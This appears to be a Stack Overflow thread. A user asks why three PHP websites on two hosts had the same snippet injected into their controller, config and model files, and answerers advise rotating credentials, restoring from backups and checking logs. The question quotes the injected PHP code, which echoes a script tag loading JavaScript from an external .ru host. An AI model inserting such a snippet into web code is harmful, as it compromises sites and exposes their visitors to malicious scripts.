0

I have three PHP websites. Two of them in the same hosting and one in another host, the three websites had a code injection in controllers, config and model files in the same time like this 

#266a81#
if(empty($nwu)) {
$nwu = "<script type=\"text/javascript\" src=\"http://allinclusivetravel.ru/w96rnjzc.php?id=1709100\"></script>";
echo $nwu;
}

I want to know the reason and the solution for that, please.

halfer
  • 19,824
  • 17
  • 99
  • 186
Alaa
  • 1

2 Answers2

1

If they have injected code directly into your source files, your host account or server has been compromised. Changed all your credentials, SSH keys, etc, and contact your hosting immediately.

You will have to manually removed all the code they injected.

John Cartwright
  • 5,109
  • 22
  • 25
  • i removed the code from the sites , but i want to know from where it came and how can i know if it will come another time in the future or not?? – Alaa Jun 06 '15 at 12:59
  • I can't possibly answer this. You have an exploit either in your code, or your server. Likely attack vectors are you allowed a script to be uploaded which allows remote execution of code. There are a million possible reasons. – John Cartwright Jun 06 '15 at 14:01
  • Regarding "manually removing" code - surely the best advice is to restore the code from version control? Or, if version control is not in use, backup? Of course, anyone in this situation will also have to work out how the attackers got in as well, so as not to have the situation happen again. – halfer Oct 10 '15 at 08:32
0

Maybe I did not understand, you have to remove the tag? If so, you can try this: remove script tag from HTML content

Community
  • 1
  • 1
Scream
  • 100
  • 3
  • 11
  • i want to know the reason ?? already i removed the code from all the sites but i didn't from know from where it comes!! – Alaa Jun 06 '15 at 12:58
  • If it's present in all pages I think that your server has been hacked. Check system logs and last modify date of all files. – Scream Jun 07 '15 at 05:54